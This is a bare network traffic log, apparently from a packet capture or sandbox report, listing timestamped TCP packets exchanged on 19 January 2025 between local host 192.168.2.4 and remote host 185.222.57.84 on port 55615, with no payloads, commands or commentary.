Jan 19, 2025 13:02:22.676386118 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676398993 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676423073 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676435947 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676450968 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676476002 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676489115 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676500082 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676542997 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676557064 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676580906 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676594973 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676619053 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676630974 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676655054 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676667929 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676691055 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676702976 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676727057 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676739931 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676781893 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676795959 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676843882 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676856995 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676907063 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676920891 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676934004 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676947117 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676973104 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676985979 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.676997900 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677011013 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677036047 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677047968 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677073002 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677087069 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677102089 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677534103 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677645922 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677659035 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:22.677673101 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.623109102 CET	55615	49744	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.625102997 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.630114079 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.630188942 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.634335995 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.639246941 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.677813053 CET	49744	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.990582943 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995604038 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995635033 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995649099 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995662928 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995703936 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995719910 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995729923 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995759010 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995781898 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995814085 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995841980 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995856047 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995865107 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995904922 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:23.995912075 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:23.995992899 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.000538111 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000636101 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000649929 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000678062 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000690937 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000704050 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.000785112 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.044148922 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.045229912 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.081931114 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.082101107 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087009907 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087052107 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087105989 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087107897 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087122917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087179899 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087186098 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087193012 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087248087 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087260008 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087272882 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087340117 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087390900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087407112 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087454081 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087459087 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087466955 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087482929 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087496042 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087518930 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087532043 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087543964 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087584972 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087585926 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087599993 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087658882 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087719917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087733030 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087755919 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087800026 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087821960 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087836027 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087846994 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087889910 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.087917089 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087933064 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.087987900 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.088002920 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088059902 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.088092089 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088191032 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088231087 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088251114 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.088378906 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088392019 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088411093 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.088462114 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092235088 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092263937 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092292070 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092309952 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092348099 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092366934 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092377901 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092400074 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092406034 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092432976 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092442036 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092472076 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092516899 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092605114 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092663050 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092706919 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092727900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092784882 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092806101 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092874050 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.092911959 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092941046 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.092988014 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093003988 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093039989 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093105078 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093135118 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093152046 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093203068 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093306065 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093319893 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093329906 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093381882 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093410969 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093425035 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093439102 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093462944 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093486071 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093497992 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093511105 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093516111 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093555927 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093604088 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093617916 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093640089 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093652964 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093652964 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093679905 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093725920 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093759060 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093771935 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093795061 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093807936 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093821049 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093821049 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093833923 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093858957 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093863010 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093873978 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093892097 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093899012 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093911886 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093941927 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093946934 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093961954 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.093976974 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.093986988 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094002008 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094034910 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094048023 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094054937 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094095945 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094099045 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094111919 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094146967 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094157934 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094166040 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094188929 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094218969 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094229937 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094255924 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094281912 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094300032 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094312906 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094347000 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094347954 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094361067 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094374895 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094377041 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.094405890 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.094434023 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.096939087 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097099066 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097220898 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097254038 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097316027 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097343922 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097413063 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097440004 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097481966 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097496033 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097567081 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097590923 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097593069 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097620964 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097647905 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097650051 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097678900 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097707033 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097731113 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097744942 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097773075 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097781897 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097795963 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097799063 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097827911 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097851992 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097912073 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097925901 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097949028 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097961903 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.097970963 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.097976923 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098016024 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098076105 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098093033 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098117113 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098140001 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098165989 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098207951 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098221064 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098248005 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098259926 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098272085 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098283052 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098297119 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098323107 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098335981 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098350048 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098365068 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098371983 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098393917 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098419905 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098428965 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098443031 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098448038 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098474026 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098480940 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098496914 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098503113 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098541021 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098552942 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098572969 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098587990 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098599911 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098614931 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098628044 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098632097 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098644972 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098685980 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098702908 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098716974 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098732948 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098746061 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098768950 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098798990 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098814964 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098826885 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098860025 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098876953 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098885059 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098906040 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098926067 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.098933935 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.098958969 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099020958 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099023104 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099035025 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099047899 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099061012 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099073887 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099106073 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099144936 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099159002 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099180937 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099195004 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099198103 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099225044 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099234104 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099247932 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099256992 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099286079 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099296093 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099298954 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099350929 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099351883 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099394083 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099400997 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099455118 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099517107 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099529028 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099562883 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099589109 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099607944 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099621058 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099647999 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099659920 CET	55615	49745	185.222.57.84	192.168.2.4
Jan 19, 2025 13:02:24.099689007 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099718094 CET	49745	55615	192.168.2.4	185.222.57.84
Jan 19, 2025 13:02:24.099735975 CET	55615	49745	185.222.57.84	192.168.2.4
